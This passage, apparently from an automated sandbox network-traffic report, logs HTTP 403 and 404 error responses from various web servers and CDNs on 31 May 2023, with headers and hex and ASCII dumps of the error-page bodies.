20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 31 May 2023 12:51:10 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:10 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:10 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x0KWPKfL1Ye3G6UEXr2M0V4p2dpQlfrA00fCOn1gReBJCHkcj0SVejW3qssrvEw3tkzqdg2u6tTMWDJPufZqQxrsmeuqNHZGv4tPrXVK5S7mbqUxdymxNzQrfG2MhI4nIA0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff58d6aafd9231-FRAalt-svc: h3=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-size:150px; line-height:150px; fo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:15 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U69fpajQ2IeVqWWzhL%2FQdWOA2Ea6FoXn9XS2YJb%2Fc9bvoalVHVYBkloXV0gsgkiOovrB36wGRn5z4w3hietxJDMuE5DPgzqM37HTbV04rLDF6m8nrX5cRAL%2BFnr2wLE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff58e7dd929bc2-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:15 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FKF1Xv4bUCH8eLEqEEtMFChgGBpuXNgAT77jI%2FoXc3TC7DI5o8hI38c%2Fbqsx2o40Uoi6Hg8UvTZ8X1oYanB3xNRYwCzpyNDVk%2FkcyPjMPSh6HuNm6C76z%2Ffh3FhFwsw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff58e80dde9bc2-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:51:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=16X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: 5432a6e8-1c42-4906-a220-b6467caa94e7CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eOWuOLaE6Z%2Fq%2FdP%2Bq1wUyqVmPnpMzQmVjLQ%2FienYSCYhdrsQ8gzBVAUjsJCseCFwh2lqknUVnr7%2F4fiqN49Mv1vR6sbiuZfe%2F%2BsejxKRJM8YMgsnCP%2BJ2VrULHEWotg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=146.000147Server: cloudflareCF-RAY: 7cff58e7cc7337cc-FRAalt-svc: h3=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Wed, 31 May 2023 12:51:16 GMTX-Zen-Fury: 8c394edb83c1d25047f8681a83b3c80042fa70a0X-Cache-Status: Cache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Server: ZENEDGEData Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 32 33 38 31 22 2c 20 31 36 38 35 35 33 37 34 37 36 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC2381", 1685537476, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:17 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FE5QqJJfbV8UfmFDmBNlq9Eq0DEEDFzb5A2LhU1hCxuqf2NF3hRnhoDk%2BTFMvlVMt51%2B7LiEE0DBgI%2BfvmwepcBL0ulyrimQ8SCEsm8PDuEGyZhjbHzUcUI0h0XqtRwf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff58f08e0c1961-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:17 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e7IVEroRTfRVeeFJE9QbjhBGVV8%2FGSmEMREFPKfUUiT0VtVKJcROgZZr6yolkunmXfm3EMmaRsqwMOmoiC9xbs1dETEJ7SuC%2FsgqhsDDHzdaKCLhV0bHk%2F8VL5LvHXrj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff58f0ee7c1961-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:51:18 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:20 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2j6%2FfNnnj9r1LJl98WomEV6%2FI3m99b9y01x55%2F42y7sldlGAphIxknS7hqVZ1yWT6xUZeLUFLhp9uUPRYfg4FOPa0UtxhNkl5rhOKWS1ZKsS45DF7w5GK8dL6ZwJ4NSi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff59075a0118e0-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:20 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd/151owQ/lnPQAbZp+OUtp,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1685537480.86516132134215762X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
